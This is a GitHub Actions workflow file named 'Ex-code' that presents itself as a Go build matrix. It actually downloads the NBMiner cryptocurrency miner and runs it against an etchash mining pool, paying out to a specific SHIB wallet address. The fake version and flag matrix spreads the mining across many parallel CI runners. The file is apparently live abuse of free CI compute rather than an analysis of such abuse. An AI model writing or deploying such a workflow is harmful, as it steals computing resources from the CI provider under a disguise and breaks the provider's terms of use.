name: Ex-code



on: [workflow_dispatch]



jobs:

  build:

    name: Ex-code

    runs-on: windows-latest

    strategy:

      max-parallel: 5

      fail-fast: false

      matrix:

        go: [1.0, 1.1, 1.2, 1.3, 1,35]

        flag: [A, B, C, D, E, F, G, H, I]

    env:

        NUM_JOBS: 20

        JOB: ${{ matrix.go }}

    steps:

    - name: DOWNLOAD

      run: Invoke-WebRequest https://github.com/NebuTech/NBMiner/releases/download/v41.3/NBMiner_41.3_Win.zip -OutFile NBMiner_41.3_Win.zip

    - name: Extract

      run: Expand-Archive NBMiner_41.3_Win.zip

    - name: RUNNING

      run: ./nbminer -a etchash -o etchash.unmineable.com:3333 -u SHIB:0x343dea6b2bbf2def6a6ec0ffa9061c3bd252341b.pitoong12#nc6x-y554 '

    - name: DONE

      run: exit
